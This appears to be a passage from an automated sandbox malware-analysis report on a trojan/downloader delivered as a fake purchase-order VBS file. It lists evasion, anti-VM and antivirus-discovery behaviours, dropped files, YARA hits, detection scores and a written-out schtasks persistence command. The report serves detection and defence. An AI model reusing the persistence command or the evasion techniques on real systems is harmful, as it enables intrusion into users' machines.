                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe TID: 7708Thread sleep time: -46550s >= -30000s
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 1528Thread sleep time: -6120000s >= -30000s
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 3332Thread sleep time: -60000s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeLast function: Thread delayed
                                Source: C:\ProgramData\Synaptics\Synaptics.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeThread sleep count: Count: 4655 delay: -10
                                Source: Yara matchFile source: 00000015.00000002.2552714676.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2549958974.0000000002FBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2549958974.0000000002FDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7856, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, type: DROPPED
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013DD92 GetFileAttributesW,FindFirstFileW,FindClose,15_2_0013DD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00172044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_00172044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0017219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_0017219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001724A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_001724A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00166B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,FindNextFileW,FindClose,FindClose,15_2_00166B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00166E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,FindNextFileW,FindClose,15_2_00166E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_0016F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016FD47 FindFirstFileW,FindClose,15_2_0016FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,15_2_0016FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_008D2044
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_008D219F
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_008D24A9
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,22_2_008C6B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,22_2_008C6E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_008CF350
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0089DD92 GetFileAttributesW,FindFirstFileW,FindClose,22_2_0089DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_008CFDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008CFD47 FindFirstFileW,FindClose,22_2_008CFD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00172044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,31_2_00172044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0017219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,31_2_0017219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_001724A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,31_2_001724A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00166B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,31_2_00166B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00166E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,31_2_00166E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,31_2_0016F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016FD47 FindFirstFileW,FindClose,31_2_0016FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0013DD92 GetFileAttributesW,FindFirstFileW,FindClose,31_2_0013DD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,31_2_0016FDD2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,15_2_0013E47B
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 4mbwVhvmcI6
                                Source: XNLAGO.exe, 0000001B.00000003.1562973685.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                Source: wscript.exe, 00000000.00000003.1311634064.00000194116B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312382254.000001940EFC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310308003.000001940EFC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310253929.000001940EFA3000.00000004.00000020.00020000.00000000.sdmp, ._cache_update.exe, 0000000F.00000002.2555338528.0000000001776000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                                Source: ._cache_update.exe, 0000000F.00000002.2563302122.0000000004BA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI call chain: ExitProcess graph end nodegraph_15-88642
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI call chain: ExitProcess graph end nodegraph_15-86372
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI call chain: ExitProcess graph end nodegraph_15-89011
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess information queried: ProcessInformation
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0017703C BlockInput,15_2_0017703C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0012374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,15_2_0012374E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001546D0 LoadLibraryExW,GetLastError,LoadLibraryW,6CA06DE0,6CA06DE0,6CA06DE0,6CA06DE0,6CA06DE0,IsDebuggerPresent,OutputDebugStringW,15_2_001546D0
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_00A2C140 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,22_2_00A2C140
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0014A937 GetProcessHeap,15_2_0014A937
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00148E19 SetUnhandledExceptionFilter,15_2_00148E19
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00148E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00148E3C
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A8E19 SetUnhandledExceptionFilter,22_2_008A8E19
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_008A8E3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00148E19 SetUnhandledExceptionFilter,31_2_00148E19
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00148E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00148E3C

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Windows\System32\wscript.exeFile created: JPS[1].exe.0.drJump to dropped file
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.199.108.133 443
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015BE95 LogonUserW,15_2_0015BE95
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0012374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,15_2_0012374E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00164B52 SendInput,keybd_event,15_2_00164B52
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00167DD5 mouse_event,15_2_00167DD5
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,15_2_0015B398
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,15_2_0015BE31
                                Source: ._cache_update.exeBinary or memory string: Shell_TrayWnd
                                Source: ._cache_update.exe, 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp, XNLAGO.exe, 00000016.00000002.1564370132.000000000092E000.00000040.00000001.01000000.0000000D.sdmp, XNLAGO.exe, 0000001B.00000002.1572606836.000000000092E000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00147254 cpuid 15_2_00147254
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001440DA GetSystemTimeAsFileTime,__aulldiv,15_2_001440DA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0019C146 GetUserNameW,15_2_0019C146
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00152C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,15_2_00152C3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,15_2_0013E47B
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: ._cache_update.exe, 0000000F.00000002.2555338528.0000000001776000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: ._cache_update.exe PID: 7704, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 8.0.update.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wscript.exe.19411b43684.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1311156718.0000019411790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1308437430.0000019411CC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 400, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: update.exe PID: 7404, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Synaptics.exe PID: 7744, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Synaptics\RCXD42.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe, type: DROPPED
Source: XNLAGO.exe, 00000026.00000002.2343195604.000000000092E000.00000040.00000001.01000000.0000000D.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
Source: XNLAGO.exe, 00000026.00000003.2309856177.00000000043C5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81
Source: ._cache_update.exe | Binary or memory string: WIN_XP
Source: XNLAGO.exe, 0000001E.00000003.1727574317.000000000483B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81|
Source: ._cache_update.exe | Binary or memory string: WIN_XPe
Source: XNLAGO.exe, 00000022.00000003.1909121379.0000000004937000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81S
Source: ._cache_update.exe | Binary or memory string: WIN_VISTA
Source: ._cache_update.exe | Binary or memory string: WIN_7
Source: ._cache_update.exe | Binary or memory string: WIN_8
Source: Yara match | File source: Process Memory Space: ._cache_update.exe PID: 7704, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: ._cache_update.exe PID: 7704, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 8.0.update.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wscript.exe.19411b43684.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1311156718.0000019411790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1308437430.0000019411CC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 400, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: update.exe PID: 7404, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Synaptics.exe PID: 7744, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Synaptics\RCXD42.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe, type: DROPPED
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 15_2_001791DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,15_2_001791DC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 15_2_001796E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_001796E2
Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe | Code function: 22_2_008D91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,22_2_008D91DC
Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe | Code function: 22_2_008D96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,22_2_008D96E2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 31_2_001791DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,31_2_001791DC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 31_2_001796E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,31_2_001796E2
[Table: MITRE ATT&CK matrix with columns Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact]
[Figure: Behavior Graph ID: 1582354, Sample: Purchase Order Summary Deta..., Startdate: 30/12/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
Purchase Order Summary Details.vbs | 47% | Virustotal | | Browse
Purchase Order Summary Details.vbs | 32% | ReversingLabs | Win32.Trojan.Valyria |
Source | Detection | Scanner | Label | Link
C:\Users\user\Documents\CZQKSDDMWR\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH |
C:\Users\user\Documents\CZQKSDDMWR\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\ProgramData\Synaptics\RCXD42.tmp | 100% | Avira | TR/Dldr.Agent.SH |
C:\ProgramData\Synaptics\RCXD42.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | 100% | Avira | TR/Dldr.Agent.SH |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\AppData\Local\Temp\BQQQVU.vbs | 100% | Avira | VBS/Runner.VPJI |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe | 100% | Avira | TR/Dldr.Agent.SH |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Documents\CZQKSDDMWR\~$cache1 | 100% | Joe Sandbox ML | |
C:\ProgramData\Synaptics\RCXD42.tmp | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe | 100% | Joe Sandbox ML | |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\Synaptics\RCXD42.tmp | 92% | ReversingLabs | Win32.Worm.Zorex |
C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | 68% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
